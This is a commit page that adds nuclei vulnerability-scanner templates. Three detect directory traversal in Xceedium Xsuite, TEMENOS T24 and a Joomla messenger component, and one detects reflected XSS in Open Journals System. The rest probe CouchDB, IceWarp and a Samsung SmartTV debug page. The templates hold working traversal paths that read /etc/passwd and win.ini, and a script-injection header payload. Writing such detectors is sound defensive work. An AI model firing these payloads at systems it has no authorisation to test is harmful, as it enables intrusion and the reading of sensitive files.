Skip to content

Commit 2267833

Browse files
committed
update nuclei-templates 2022-07-12 10:04:1657591449
1 parent 0edda86 commit 2267833

File tree

7 files changed

+227
-0
lines changed

7 files changed

+227
-0
lines changed
Lines changed: 22 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,22 @@
1+
id: couchdb_CVE_2022_24706-detect
2+
3+
info:
4+
name: Detect couchdb_CVE_2022_24706-detect
5+
author: 51pwn
6+
severity: info
7+
description: Check couchdb protocol status.
8+
tags: network,couchdb
9+
10+
network:
11+
- inputs:
12+
- data: "{{hex_decode('00016e')}}"
13+
14+
host:
15+
- "{{Hostname}}"
16+
read-size: 4
17+
18+
matchers-condition: and
19+
matchers:
20+
- type: binary
21+
binary:
22+
- "00001111"
Lines changed: 33 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,33 @@
1+
id: CVE-2015-4666
2+
info:
3+
name: Xceedium Xsuite 2.4.4.5 - Directory Traversal
4+
author: 0x_Akoko
5+
severity: high
6+
description: Directory traversal vulnerability in opm/read_sessionlog.php in Xceedium Xsuite 2.4.4.5 and earlier allows remote attackers to read arbitrary files in the logFile parameter.
7+
reference:
8+
- https://www.modzero.com/advisories/MZ-15-02-Xceedium-Xsuite.txt
9+
- https://www.cvedetails.com/cve/CVE-2015-4666
10+
- http://packetstormsecurity.com/files/132809/Xceedium-Xsuite-Command-Injection-XSS-Traversal-Escalation.html
11+
- http://www.modzero.ch/advisories/MZ-15-02-Xceedium-Xsuite.txt
12+
classification:
13+
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
14+
cvss-score: 7.5
15+
cve-id: CVE-2015-4666
16+
cwe-id: CWE-22
17+
tags: cve,cve2015,xceedium,xsuite,lfi
18+
19+
requests:
20+
- method: GET
21+
path:
22+
- "{{BaseURL}}/opm/read_sessionlog.php?logFile=....//....//....//....//etc/passwd"
23+
24+
matchers-condition: and
25+
matchers:
26+
27+
- type: regex
28+
regex:
29+
- "root:[x*]:0:0"
30+
31+
- type: status
32+
status:
33+
- 200
Lines changed: 36 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,36 @@
1+
id: CVE-2019-14251
2+
3+
info:
4+
name: T24 in TEMENOS Channels R15.01 - Pre Authenticated Path Traversal
5+
author: 0x_Akoko
6+
severity: high
7+
description: An unauthenticated path traversal vulnerability was discovered permitting an attacker to exfiltrate data directly from the T24 web server.
8+
reference:
9+
- https://github.com/kmkz/exploit/blob/master/CVE-2019-14251-TEMENOS-T24.txt
10+
- https://www.cvedetails.com/cve/CVE-2019-14251
11+
- https://vuldb.com/?id.146815
12+
classification:
13+
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
14+
cvss-score: 7.5
15+
cve-id: CVE-2019-14251
16+
cwe-id: CWE-22
17+
tags: cve,cve2019,temenos,lfi,unauth
18+
19+
requests:
20+
- method: GET
21+
path:
22+
- "{{BaseURL}}/WealthT24/GetImage?docDownloadPath=/etc/passwd"
23+
- "{{BaseURL}}/WealthT24/GetImage?docDownloadPath=c:/windows/win.ini"
24+
25+
matchers-condition: and
26+
matchers:
27+
28+
- type: regex
29+
regex:
30+
- "root:.*:0:0:"
31+
- "for 16-bit app support"
32+
condition: or
33+
34+
- type: status
35+
status:
36+
- 200
Lines changed: 32 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,32 @@
1+
id: CVE-2019-9922
2+
info:
3+
name: JE Messenger 1.2.2 Joomla - Directory Traversal
4+
author: 0x_Akoko
5+
severity: high
6+
description: An issue was discovered in the Harmis JE Messenger component 1.2.2 for Joomla. Directory Traversal allows read access to arbitrary files.
7+
reference:
8+
- https://github.com/azd-cert/CVE/blob/master/CVEs/CVE-2019-9922.md
9+
- https://www.cvedetails.com/cve/CVE-2019-9922
10+
- https://extensions.joomla.org/extension/je-messenger/
11+
classification:
12+
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
13+
cvss-score: 7.5
14+
cve-id: CVE-2019-9922
15+
cwe-id: CWE-22
16+
tags: cve,cve2019,joomla,messenger,lfi
17+
18+
requests:
19+
- method: GET
20+
path:
21+
- "{{BaseURL}}/index.php/component/jemessenger/box_details?task=download&dw_file=../../.././../../../etc/passwd"
22+
23+
matchers-condition: and
24+
matchers:
25+
26+
- type: regex
27+
regex:
28+
- "root:[x*]:0:0"
29+
30+
- type: status
31+
status:
32+
- 200
Lines changed: 44 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,44 @@
1+
id: CVE-2022-24181
2+
3+
info:
4+
name: PKP Open Journals System 3.3 - Cross-Site Scripting (XSS)
5+
author: lucasljm2001,ekrause
6+
severity: medium
7+
description: |
8+
Detects an XSS vulnerability in Open Journals System.
9+
reference:
10+
- https://www.exploit-db.com/exploits/50881
11+
- https://github.com/pkp/pkp-lib/issues/7649
12+
- https://youtu.be/v8-9evO2oVg
13+
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-24181
14+
- https://nvd.nist.gov/vuln/detail/cve-2022-24181
15+
classification:
16+
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
17+
cvss-score: 6.1
18+
cve-id: CVE-2022-24181
19+
metadata:
20+
verified: true
21+
tags: cve,cve2022,xss,oss,pkp-lib
22+
23+
requests:
24+
- raw:
25+
- |
26+
GET /iupjournals/index.php/esj HTTP/2
27+
Host: {{Hostname}}
28+
X-Forwarded-Host: foo"><script>alert(document.domain)</script><x=".com
29+
30+
matchers-condition: and
31+
matchers:
32+
- type: word
33+
part: body
34+
words:
35+
- '<script>alert(document.domain)</script><x=".com/iupjournals'
36+
37+
- type: word
38+
part: header
39+
words:
40+
- text/html
41+
42+
- type: status
43+
status:
44+
- 200
Lines changed: 34 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,34 @@
1+
id: icewarp-panel-detect
2+
3+
info:
4+
name: IceWarp Panel Detect
5+
author: ritikchaddha
6+
severity: info
7+
metadata:
8+
verified: true
9+
shodan-query: title:"icewarp"
10+
tags: icewarp,panel
11+
12+
requests:
13+
- method: GET
14+
path:
15+
- "{{BaseURL}}/webmail/"
16+
17+
matchers-condition: and
18+
matchers:
19+
20+
- type: word
21+
part: header
22+
words:
23+
- 'IceWarp'
24+
25+
- type: status
26+
status:
27+
- 200
28+
29+
extractors:
30+
- type: regex
31+
part: header
32+
group: 1
33+
regex:
34+
- 'Server: (.{4,20})'
Lines changed: 26 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,26 @@
1+
id: samsung-smarttv-debug
2+
info:
3+
name: Samsung SmartTV Debug Config
4+
author: pussycat0x
5+
severity: info
6+
metadata:
7+
verified: true
8+
shodan-query: title:"Debug Config"
9+
tags: samsung,tech,iot
10+
11+
requests:
12+
- method: GET
13+
path:
14+
- '{{BaseURL}}'
15+
16+
matchers-condition: and
17+
matchers:
18+
- type: word
19+
words:
20+
- '<title>Debug Config</title>'
21+
- 'MultiScreen Service'
22+
condition: and
23+
24+
- type: status
25+
status:
26+
- 200

0 commit comments

Comments
 (0)